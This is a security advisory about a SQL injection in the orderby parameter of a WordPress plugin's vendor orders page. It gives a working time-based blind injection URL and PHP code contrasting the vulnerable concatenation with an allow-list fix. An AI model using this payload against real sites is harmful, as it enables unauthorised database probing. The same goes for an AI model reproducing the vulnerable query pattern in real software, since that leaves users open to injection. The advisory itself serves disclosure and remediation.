The plugin does not properly sanitise and escape a parameter (the `orderby` request parameter of the vendor orders page, see the proof of concept below) before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as Admin Vendor and above.
As an Admin Vendor, open the URL below. The injected `sleep(10)` is evaluated inside the `ORDER BY` clause, so a vulnerable site answers roughly ten seconds later than normal (a time-based blind injection); the trailing `--+` decodes to `-- ` and comments out the remainder of the statement:

https://example.com/wp-admin/admin.php?page=wcpv-vendor-orders&orderby=order_id`,(select+sleep(10)+from+dual+where+database()+like+database())--+
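The following is an added illustration, not the plugin's own code, of the pattern behind this class of bug and of the fix a reviewer would expect. The table and column names, the function names and the fixed allow-list are assumptions chosen for the example. It shows why `$wpdb->prepare()` placeholders alone do not help: `ORDER BY` takes an identifier, not a value, so the column name has to be validated against an allow-list (or, on WordPress 6.2 and later, passed through the `%i` identifier placeholder) instead of being concatenated.

```php
<?php
// Added example, not code from the plugin or from the advisory.
// Table, column and function names are assumptions for illustration.
declare(strict_types=1);

// Vulnerable pattern: the orderby request parameter is concatenated into the
// ORDER BY clause. A %s/%d placeholder cannot parameterise an identifier, so
// wrapping this in $wpdb->prepare() would not close the hole; only validation does.
function build_orders_query_vulnerable(string $orderby, string $order): string
{
    return "SELECT order_id, vendor_id, total FROM wp_wcpv_vendor_orders"
         . " WHERE vendor_id = %d ORDER BY `" . $orderby . "` " . $order;
}

// Hardened pattern: the user-supplied value is checked against a fixed
// allow-list of column names and the direction is restricted to ASC/DESC.
// Anything else falls back to a default and never reaches the query text.
const ORDERBY_ALLOWED = ['order_id', 'date', 'total', 'status'];

function build_orders_query_safe(string $orderby, string $order): string
{
    if (!in_array($orderby, ORDERBY_ALLOWED, true)) {
        $orderby = 'order_id';
    }
    $order = (strtoupper($order) === 'ASC') ? 'ASC' : 'DESC';
    return "SELECT order_id, vendor_id, total FROM wp_wcpv_vendor_orders"
         . " WHERE vendor_id = %d ORDER BY `" . $orderby . "` " . $order;
}

// The advisory's payload after URL decoding ('+' becomes a space): the backtick
// closes the quoted identifier, the comma appends a second ORDER BY expression
// that calls SLEEP(10), and "-- " comments out the rest of the statement.
$payload = "order_id`,(select sleep(10) from dual where database() like database())-- ";

echo "vulnerable: " . build_orders_query_vulnerable($payload, 'DESC') . PHP_EOL;
echo "hardened:   " . build_orders_query_safe($payload, 'DESC') . PHP_EOL;
```

Running this with `php` prints the vulnerable statement with the `SLEEP(10)` subquery spliced into its `ORDER BY`, and the hardened statement ordering by the default `order_id` column. When checking a live site for this issue, compare the response time of the proof-of-concept URL against a request with a benign `orderby=order_id`; a consistent delay of about ten seconds is the signal, since the injection returns no data in the page body.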